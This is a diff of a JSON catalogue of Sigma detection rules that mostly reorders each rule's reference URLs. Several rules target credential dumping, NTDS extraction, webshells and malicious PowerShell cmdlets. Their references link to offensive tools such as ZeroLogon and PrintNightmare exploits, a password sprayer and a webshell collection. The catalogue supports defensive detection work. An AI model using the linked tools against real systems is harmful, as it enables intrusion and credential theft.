"https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" ], "tags": [ 
@@ -66806,8 +66830,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://twitter.com/nas_bench/status/1550836225652686848", + "https://persistence-info.github.io/Data/windowsterminalprofile.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" ], "tags": [ @@ -66864,13 +66888,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://pentestlab.blog/tag/ntds-dit/", - "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://github.com/zcgonvh/NTDSDumpEx", + "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ 
@@ -66903,8 +66927,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" ], @@ -66939,12 +66963,12 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://www.cobaltstrike.com/help-opsec", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", + "https://www.cobaltstrike.com/help-opsec", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" ], "tags": [ 
@@ -67010,10 +67034,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", "https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", - "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" ], "tags": "No established tags" @@ -67091,8 +67115,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ @@ -67160,9 +67184,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml" ], "tags": [ 
@@ -67253,8 +67277,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" ], "tags": [ @@ -67321,8 +67345,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" ], "tags": [ @@ -67459,9 +67483,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://www.joeware.net/freetools/tools/adfind/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" ], "tags": [ @@ -67485,8 +67509,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" ], "tags": "No established tags" 
@@ -67507,8 +67531,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" ], "tags": [ @@ -67643,8 +67667,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" ], "tags": [ @@ -67711,9 +67735,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], "tags": [ 
@@ -67804,9 +67828,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" ], "tags": [ @@ -67832,10 +67856,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" ], "tags": [ 
@@ -68044,19 +68068,19 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", "https://github.com/samratashok/nishang", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://adsecurity.org/?p=2921", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" ], "tags": [ @@ -68289,8 +68313,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" ], @@ -68359,8 +68383,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" ], "tags": [ 
@@ -68384,9 +68408,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" ], "tags": [ @@ -68419,10 +68443,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", - "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" ], "tags": [ 
@@ -68626,9 +68650,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", - "https://twitter.com/cyb3rops/status/1514217991034097664", "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" ], "tags": [ @@ -68772,8 +68796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511489821247684615", "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" ], "tags": [ @@ -68807,8 +68831,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" ], "tags": [ 
@@ -68856,8 +68880,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ @@ -68981,8 +69005,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", "https://www.radmin.fr/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" ], "tags": [ @@ -69007,8 +69031,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" ], "tags": [ 
@@ -69041,8 +69065,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" ], "tags": [ @@ -69183,9 +69207,9 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://twitter.com/mvelazco/status/1410291741241102338", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml" ], "tags": [ 
@@ -69317,15 +69341,15 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ 
@@ -69504,9 +69528,9 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": "No established tags" @@ -69527,8 +69551,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ @@ -69551,8 +69575,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ @@ -69575,8 +69599,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ 
@@ -69599,8 +69623,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ @@ -69623,8 +69647,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ @@ -69647,8 +69671,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ @@ -69671,8 +69695,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ 
@@ -69695,8 +69719,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ @@ -69719,8 +69743,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ @@ -69743,8 +69767,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ @@ -69769,8 +69793,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ 
@@ -69953,11 +69977,11 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://o365blog.com/post/aadbackdoor/", - "https://www.sygnia.co/golden-saml-advisory", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://www.sygnia.co/golden-saml-advisory", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://o365blog.com/post/aadbackdoor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" ], "tags": [ @@ -70363,11 +70387,11 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" ], "tags": [ @@ -70416,8 +70440,8 @@ "logsource.product": "gcp", "refs": [ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://cloud.google.com/kubernetes-engine/docs", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://cloud.google.com/kubernetes-engine/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" ], "tags": [ 
@@ -70468,8 +70492,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ @@ -70638,8 +70662,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ @@ -70672,8 +70696,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" ], 
@@ -70779,8 +70803,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], @@ -70884,13 +70908,13 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + 